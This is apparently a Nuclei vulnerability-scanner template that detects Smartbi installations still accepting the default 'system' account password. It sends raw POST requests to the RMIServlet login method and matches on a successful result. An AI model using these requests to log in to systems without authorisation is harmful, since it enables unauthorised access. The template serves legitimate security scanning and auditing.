id: smartbi-default-user

info:
  name: smartbi - Default user weakpass
  author: unknown
  severity: high
  description: |
    Smartbi default user weakpass.
  reference:
    - https://mp.weixin.qq.com/s?__biz=MzIwMDk1MjMyMg==&mid=2247491565&idx=1&sn=eb2af62a72167c6f82ae8ec3db878511
  tags: smartbi

http:
  - raw:
      - |
        POST /smartbi/vision/RMIServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 67

        className=UserService&methodName=loginFromDB&params=["system","0a"]
      - |
        POST /vision/RMIServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 67

        className=UserService&methodName=loginFromDB&params=["system","0a"]
    matchers:
      - type: word
        words:
          - '"result":true'
        part: body